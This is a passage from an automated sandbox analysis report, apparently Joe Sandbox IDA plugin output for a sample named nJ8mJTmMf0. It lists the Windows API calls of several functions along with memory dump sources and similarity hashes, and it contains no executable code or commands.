                                                      • Part of subcall function 00609997: __swprintf.LIBCMT ref: 00609A0C
                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0066E917
                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0066E91F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 1389676194-0
                                                    • Opcode ID: e055cb17290e61c4d0c5b41f99700f16a3cfce347d2730d98a32e2cba0a723f0
                                                    • Instruction ID: 6d31f2f017ace4f56821f3f1d1c717cc5eac7c0824392621907b9b6b321ea85c
                                                    • Opcode Fuzzy Hash: e055cb17290e61c4d0c5b41f99700f16a3cfce347d2730d98a32e2cba0a723f0
                                                    • Instruction Fuzzy Hash: 58512035A40205DFCF45DF64C9819AEBBF6EF08310B148099E849AB3A2DB31ED51DF64
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b869eaf4c0655f454e04403023042a5c4f0902dd8c5dd4244ee2b6e0bd9ac8f0
                                                    • Instruction ID: 75b11a04e2b74b18baa44cd8f6978f50b5ab2cc5436319131ba3fca3fe0a68f2
                                                    • Opcode Fuzzy Hash: b869eaf4c0655f454e04403023042a5c4f0902dd8c5dd4244ee2b6e0bd9ac8f0
                                                    • Instruction Fuzzy Hash: 3B41E035901204ABEB20EFA8CC48FE9BBA6EB09310F140366FD15E72E1D770AD51DB61
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 00602357
                                                    • ScreenToClient.USER32(006C67B0,?), ref: 00602374
                                                    • GetAsyncKeyState.USER32(00000001), ref: 00602399
                                                    • GetAsyncKeyState.USER32(00000002), ref: 006023A7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AsyncState$ClientCursorScreen
                                                    • String ID:
                                                    • API String ID: 4210589936-0
                                                    • Opcode ID: f6a96d44a7275d0800e80908154806a3e686baddafb78d72903a01dbe8f9934c
                                                    • Instruction ID: 29216ad6206d0997822a9bbc1f77a1f4257ceff9a6300533b739434632bca11e
                                                    • Opcode Fuzzy Hash: f6a96d44a7275d0800e80908154806a3e686baddafb78d72903a01dbe8f9934c
                                                    • Instruction Fuzzy Hash: EF415F3550411AFBDF199F68C848AEAFB76FF05324F20435AF829A22D0C7745E94DB91
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0065695D
                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 006569A9
                                                    • TranslateMessage.USER32(?), ref: 006569D2
                                                    • DispatchMessageW.USER32(?), ref: 006569DC
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006569EB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                    • String ID:
                                                    • API String ID: 2108273632-0
                                                    • Opcode ID: c3c5aad947b79f3ba11a1fa762df691613a12c50aa75104ad6a6af92f736b597
                                                    • Instruction ID: 95687f6cccb1b1ef2dce2a5a00ffff9d49ed1b6535afe8ed509aaf39b0cc5b4e
                                                    • Opcode Fuzzy Hash: c3c5aad947b79f3ba11a1fa762df691613a12c50aa75104ad6a6af92f736b597
                                                    • Instruction Fuzzy Hash: B031E331904247AADB20CF74CC44FF6BBAFAB05302F504669F821C32A1E775988DD7A0
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00658F12
                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 00658FBC
                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00658FC4
                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 00658FD2
                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00658FDA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessagePostSleep$RectWindow
                                                    • String ID:
                                                    • API String ID: 3382505437-0
                                                    • Opcode ID: a3c52167c76fa6b2c177f501c71ec3ac28ca3dfd7272f32db4e6e0094a4e1a73
                                                    • Instruction ID: 3bb10d82f98f8a2630f414521822441e0005f7fe86cacefecdb233024d594071
                                                    • Opcode Fuzzy Hash: a3c52167c76fa6b2c177f501c71ec3ac28ca3dfd7272f32db4e6e0094a4e1a73
                                                    • Instruction Fuzzy Hash: E431AB71500219EFDB14CF68D94CAEE7BB6EB48316F104229FD25EB2D0CBB09958DB90
                                                    APIs
                                                    • IsWindowVisible.USER32(?), ref: 0065B6C7
                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0065B6E4
                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0065B71C
                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0065B742
                                                    • _wcsstr.LIBCMT ref: 0065B74C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                    • String ID:
                                                    • API String ID: 3902887630-0
                                                    • Opcode ID: 6d0d1f6fa099f716984a4d03923d18d36bbf7cc8256ed74100d8dad581b011a8
                                                    • Instruction ID: e0e5cd43263129662cf8fbb112fa92e2fc9b767e2a1185181540b70c321ee31f
                                                    • Opcode Fuzzy Hash: 6d0d1f6fa099f716984a4d03923d18d36bbf7cc8256ed74100d8dad581b011a8
                                                    • Instruction Fuzzy Hash: 93210731204254BAEB255B39AC49E7B7BAADF49711F10512DFC05CA2A1EF61CC8197A0
                                                    APIs
                                                      • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0068B44C
                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0068B471
                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0068B489
                                                    • GetSystemMetrics.USER32(00000004), ref: 0068B4B2
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00671184,00000000), ref: 0068B4D0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$MetricsSystem
                                                    • String ID:
                                                    • API String ID: 2294984445-0
                                                    • Opcode ID: dad609d438b231b37c1f3af467fba968d8ca05e7cd7fe2e7b1143519aed27426
                                                    • Instruction ID: 4d7cbedb2a6cd7b07e5a2d24738f74c7a0eadb1122ecb29f01252df0423e2794
                                                    • Opcode Fuzzy Hash: dad609d438b231b37c1f3af467fba968d8ca05e7cd7fe2e7b1143519aed27426
                                                    • Instruction Fuzzy Hash: 78218371510255AFCB10AF38DC05ABA3BE6FB05721F145738F926D72E6E7309851DB90
                                                    APIs
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00659802
                                                      • Part of subcall function 00607D2C: _memmove.LIBCMT ref: 00607D66
                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00659834
                                                    • __itow.LIBCMT ref: 0065984C
                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00659874
                                                    • __itow.LIBCMT ref: 00659885
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$__itow$_memmove
                                                    • String ID:
                                                    • API String ID: 2983881199-0
                                                    • Opcode ID: 63b29335374f57009b301af805d45710e428480b972d5befd2d229a61b68696d
                                                    • Instruction ID: 99fccc5e867cc09b623a1e40dfc913b2191a787fac3fd67d5cbed67e52ffeaf0
                                                    • Opcode Fuzzy Hash: 63b29335374f57009b301af805d45710e428480b972d5befd2d229a61b68696d
                                                    • Instruction Fuzzy Hash: E521B671A40204FBDF109B65CC86EEE7BABEF4A711F041029FD049B391D6709D8987A1
                                                    APIs
                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0060134D
                                                    • SelectObject.GDI32(?,00000000), ref: 0060135C
                                                    • BeginPath.GDI32(?), ref: 00601373
                                                    • SelectObject.GDI32(?,00000000), ref: 0060139C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ObjectSelect$BeginCreatePath
                                                    • String ID:
                                                    • API String ID: 3225163088-0
                                                    • Opcode ID: d77a09ec1cc279d09f42f5fad32f37339dabfead10419f92dba59929e1b147c4
                                                    • Instruction ID: 1f269fc19bb17e3e2d5a637bc66c1fc88870d1564649cc3d24d6c010e0cc1519
                                                    • Opcode Fuzzy Hash: d77a09ec1cc279d09f42f5fad32f37339dabfead10419f92dba59929e1b147c4
                                                    • Instruction Fuzzy Hash: 23218070941308EFDB189F25DC08BBA7BBBFB01321F149226F810DA2E0D3719991DBA4
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memcmp
                                                    • String ID:
                                                    • API String ID: 2931989736-0
                                                    • Opcode ID: 21aaca578657897a09d09f1fb57bd45992d09322d0ccd0f31dc3a1bd332f3513
                                                    • Instruction ID: 95aacd2d8abacb092095c043c6406903dcf05df46dddd360a9753229c0820355
                                                    • Opcode Fuzzy Hash: 21aaca578657897a09d09f1fb57bd45992d09322d0ccd0f31dc3a1bd332f3513
                                                    • Instruction Fuzzy Hash: 5701F9B1608B167FDA24A5209C56FAF775F9F213B5F044014FD049A783EA50DE15C6E4
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00664D5C
                                                    • __beginthreadex.LIBCMT ref: 00664D7A
                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00664D8F
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00664DA5
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00664DAC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                    • String ID:
                                                    • API String ID: 3824534824-0
                                                    • Opcode ID: 9cf155fe2ec6c92112193d6ba702cfd7b1570a37c0427031bbf6eef9f0b97d5f
                                                    • Instruction ID: 1d2c88d8e9ce9bbf0bfcfaeeeb0a315f15fc0b4da6b9f6410242c96bfe694c88
                                                    • Opcode Fuzzy Hash: 9cf155fe2ec6c92112193d6ba702cfd7b1570a37c0427031bbf6eef9f0b97d5f
                                                    • Instruction Fuzzy Hash: 6B1108B2D04204BBC7119BA8DC08EEA7FAEEB85320F144365F915D3350DA758D4087A0
                                                    APIs
                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00658766
                                                    • GetLastError.KERNEL32(?,0065822A,?,?,?), ref: 00658770
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,0065822A,?,?,?), ref: 0065877F
                                                    • HeapAlloc.KERNEL32(00000000,?,0065822A,?,?,?), ref: 00658786
                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0065879D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 842720411-0
                                                    • Opcode ID: d68d19f4bfa9aa50112cf4eedd479597333f312d7555a899c770b96235150f2f
                                                    • Instruction ID: fd4e2256b72a025bdd5cb949af24a262128b224fe5af3034e5fecd0639db60ec
                                                    • Opcode Fuzzy Hash: d68d19f4bfa9aa50112cf4eedd479597333f312d7555a899c770b96235150f2f
                                                    • Instruction Fuzzy Hash: 61014B71200604FFDB204FA6DC88DAB7BAEFF89756B200669F849D3260DA31CC14CB60
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00665502
                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00665510
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00665518
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00665522
                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0066555E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                    • String ID:
                                                    • API String ID: 2833360925-0
                                                    • Opcode ID: 233ba935b62f84acb58c1f2eaa548f1baa6851f3748a3b625126a3685668e409
                                                    • Instruction ID: ef4bd897a46e5c625108a1d70635c6cbd66274b6223462a153292a3262287867
                                                    • Opcode Fuzzy Hash: 233ba935b62f84acb58c1f2eaa548f1baa6851f3748a3b625126a3685668e409
                                                    • Instruction Fuzzy Hash: AF011B35D04A19EBCF00EFE9E88E5EDBB7ABB09711F000596E942F2250DB305654C7A1
                                                    APIs
                                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0065758C,80070057,?,?,?,0065799D), ref: 0065766F
                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0065758C,80070057,?,?), ref: 0065768A
                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0065758C,80070057,?,?), ref: 00657698
                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0065758C,80070057,?), ref: 006576A8
                                                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0065758C,80070057,?,?), ref: 006576B4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                    • String ID:
                                                    • API String ID: 3897988419-0
                                                    • Opcode ID: dc19399dc50ef8463b6d4114548d5b4019e6a727a47f9c48d1bc36fc09931df5
                                                    • Instruction ID: fccdb3cd1a8c312c5af2c695ab21a349803ab3c2c1b133f86cdb07dca6b14540
                                                    • Opcode Fuzzy Hash: dc19399dc50ef8463b6d4114548d5b4019e6a727a47f9c48d1bc36fc09931df5
                                                    • Instruction Fuzzy Hash: 6A01A7B2601614BFDB105F58EC44BAA7FBEEF48752F140128FD08D2211E731DE4597A0
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00658608
                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00658612
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00658621
                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00658628
                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0065863E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: 68387fb1f33f35cc773ba63c53e86664431e4104e3ae8ebd60d1c18186afc5d4
                                                    • Instruction ID: eba81138c0c79762e2b6fd6084c6ba10ac52849df89212a4dc49d6279d9fa901
                                                    • Opcode Fuzzy Hash: 68387fb1f33f35cc773ba63c53e86664431e4104e3ae8ebd60d1c18186afc5d4
                                                    • Instruction Fuzzy Hash: C9F03C31201204BFEB100FA5DCDDEAB3BAEEF89755F100525F98597260DA619C45DB60
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00658669
                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00658673
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00658682
                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00658689
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0065869F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: ff798b430a4cfcb2915dd0585f88df1946046adf60412ba05e43e49a30420d35
                                                    • Instruction ID: 0fadfa8d7ee97af4a9c7900786478956d1158dc20cbd2cdb8d36c722a8a377e6
                                                    • Opcode Fuzzy Hash: ff798b430a4cfcb2915dd0585f88df1946046adf60412ba05e43e49a30420d35
                                                    • Instruction Fuzzy Hash: 60F0A970200314FFEB211FA4EC98EAB3BAEEF89755F140129FA49D3250DA619844DB60
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003E9), ref: 0065C6BA
                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0065C6D1
                                                    • MessageBeep.USER32(00000000), ref: 0065C6E9
                                                    • KillTimer.USER32(?,0000040A), ref: 0065C705
                                                    • EndDialog.USER32(?,00000001), ref: 0065C71F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
